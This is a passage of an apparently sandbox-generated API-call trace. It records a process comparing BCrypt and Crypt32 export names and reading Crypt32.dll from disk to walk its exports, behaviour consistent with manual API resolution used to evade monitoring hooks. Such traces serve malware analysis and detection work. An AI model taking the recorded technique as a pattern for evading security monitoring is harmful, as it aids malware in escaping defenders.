lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0131.564] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0131.565] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.565] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0131.566] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0131.567] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0131.567] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0131.568] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0131.568] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0131.569] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0131.570] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0131.570] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0131.570] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0131.570] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0131.570] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0131.571] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0131.571] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0131.572] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0131.573] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0131.574] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0131.574] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0131.574] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0131.574] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0131.575] GetProcessHeap () returned 0x460000 [0131.575] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2cb2010 | out: hHeap=0x460000) returned 1 [0131.575] GetProcessHeap () returned 0x460000 [0131.575] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x479190 [0131.575] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0131.791] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0131.791] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0131.791] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0131.791] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0131.792] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0131.792] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0131.792] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0131.792] GetProcessHeap () returned 0x460000 [0131.792] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1c30e0) returned 0x4075040 [0131.797] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0131.797] ReadFile (in: hFile=0x160, lpBuffer=0x4075040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4075040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0132.135] CloseHandle (hObject=0x160) returned 1 [0132.135] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0132.135] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0132.135] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0132.135] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0132.135] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0132.135] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0132.135] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0132.136] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0132.136] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0132.136] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0132.136] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0132.136] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0132.136] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0132.136] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0132.136] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0132.136] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0132.136] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0132.136] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0132.136] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0132.136] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0132.137] lstrcmpA 